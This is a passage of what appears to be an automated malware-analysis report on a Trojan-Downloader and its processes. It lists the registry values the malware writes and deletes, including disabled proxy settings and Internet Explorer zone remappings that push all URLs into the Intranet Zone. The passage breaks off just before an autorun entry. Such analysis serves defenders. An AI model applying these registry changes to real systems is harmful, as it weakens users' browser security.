[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process AutoTime.exe:496 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1462263245"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\AutoTime]
"TmN" = "51477"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 66 02 6F 83 ED 3A AB AA 20 7B DE 71 CA 2B 52"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "AutoTime.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\AutoTime\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

The Trojan-Downloader deletes the following value(s) in the system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\AutoTime\DEBUG]
"Trace Level"

The process nsk1B.tmp:2824 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 59 95 5E 57 67 18 35 93 7F 2E 66 29 B2 39 B9"

The process nsk1B.tmp:3456 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"UninstallString" = "%Program Files%\ttwifi\unins000.exe"
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"UninstallDataFile" = "%Program Files%\ttwifi\unins000.dat"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"Inno Setup: User" = "%CurrentUserName%"
"DisplayName" = "TTWiFi 1.0.0.1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"MajorVersion" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"QuietUninstallString" = "%Program Files%\ttwifi\unins000.exe /SILENT"
"Inno Setup: Setup Version" = "5.4.2.ee2 (a)"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"Inno Setup: Selected Tasks" = "desktopicon"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"InstallLocation" = "%Program Files%\ttwifi\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\osTip]
"Params" = "5DB9279D5A0CB29AA3ED55D055708882"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"DisplayIcon" = "%Program Files%\ttwifi\tiantianwifi.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"Inno Setup: Language" = "default"
"Inno Setup: Icon Group" = "ttwifi"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"InstallDate" = "20160620"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"Inno Setup: App Path" = "%Program Files%\ttwifi"
"DisplayVersion" = "1.0.0.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 35 AF EC 46 D6 05 77 7D E4 99 30 3A B6 4D 1E"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\WindowsMsg]
"osmsg.exe" = "osmsg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\ttwifi]
"tiantianwifi.exe" = "TTWIFI"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"MinorVersion" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\ttwifi]
"InstallTime" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-DOMJK.tmp]
"hp.exe" = "hp"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"Inno Setup: Deselected Tasks" = ""

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes that have no dots in their names and do not belong to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The process nsk1B.tmp:3440 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 29 5D 46 1A CE 50 8B 01 70 C1 7E 65 3D CC C9"

The process nsk1B.tmp:2856 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\ttwifi]
"Params" = "5DB9279D5A0CB29AA3ED55D055708882"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nsk1B\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 B1 1C 3C 60 0D 10 DE 61 FB FA 98 71 B1 9A 43"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan-Downloader deletes the following value(s) in the system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nsk1B\DEBUG]
"Trace Level"

The process nsb10.tmp:2136 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 5F 02 F9 86 1A B3 77 C4 B5 48 7D 27 03 BD 2A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayIcon" = "/fd="

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process qnsm13.tmp:2596 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 60 4F 12 0A 6E CE C6 90 43 2B EE 56 5B EF FC"

The process qnsm13.tmp:2588 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 44 34 02 61 29 BA 9C 2B 0D F4 0B 63 61 50 93"

The process testversion.exe:820 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 94 A0 0C B6 F6 CE F6 76 D8 F9 97 25 92 4C B9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process osmsg.exe:2332 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 4F 62 CF 24 37 B3 E2 CA 26 80 B4 C4 BC 48 37"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process osmsg.exe:2564 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\osmsg\DEBUG]
"Trace Level" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKCU\Software\osTip\actv]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 50 4F B9 63 86 74 39 17 60 1E B5 60 8A 0F A4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\osTip]
"InstallTime" = "Type: REG_QWORD, Length: 8"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes that have no dots in their names and do not belong to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To run itself automatically each time Windows is booted, the Trojan-Downloader adds the following link to its file in the system registry autorun key:

